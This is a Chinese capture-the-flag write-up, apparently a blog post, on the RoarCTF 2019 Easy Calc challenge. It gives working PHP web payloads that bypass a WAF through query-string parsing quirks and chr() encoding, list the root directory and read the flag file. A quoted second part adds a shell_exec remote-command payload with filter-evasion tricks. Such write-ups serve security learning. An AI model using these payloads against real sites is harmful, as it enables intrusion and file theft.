我们以[RoarCTF 2019]Easy Calc 1来进行讲解
尝试访问calc.php得到源码如下
尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件
那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格
绕过num传参后,我们要读取他根目录下的文件。
也就是
/calc.php?%20num=var_dump(scandir('/'))
却发现他没有返回我们想要的答案,看源码发现‘ ’引号被过滤掉了,那就用chr()绕过,chr(47)就是斜杠/
/calc.php?%20num=var_dump(scandir(chr(47)))
输入后 可以浏览根目录下的文件,而其中的falgg就是我们要读取的文件
? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
下面是某位up对这个题目的理解
这个题传e_v.a.l的时候一直传不了,才知道是个坑,利用php字符串解析特性
由于 e_v.a.l 正常POST的时候 "."会被解析为" _ "
找了好多资料最终发现 可以用这种方式绕过:
第一个" _ "我们用"[" 然后后面的"."照写
当用"["来解析为" _ "后 后面的"."是不会被转成"_"的
然后playload如下:
password=114514&e[v.a.l=echo(shell_exec('tac /fla?'));
我的绕过参考这篇文章,用shell_exec绕过system,用tac绕过cat,用fla?绕过flag
命令执行绕过WAF总结,RCE常见的Bypass思路 - FreeBuf网络安全行业门户
原文链接:https://blog.csdn.net/snowlyzz/article/details/123459590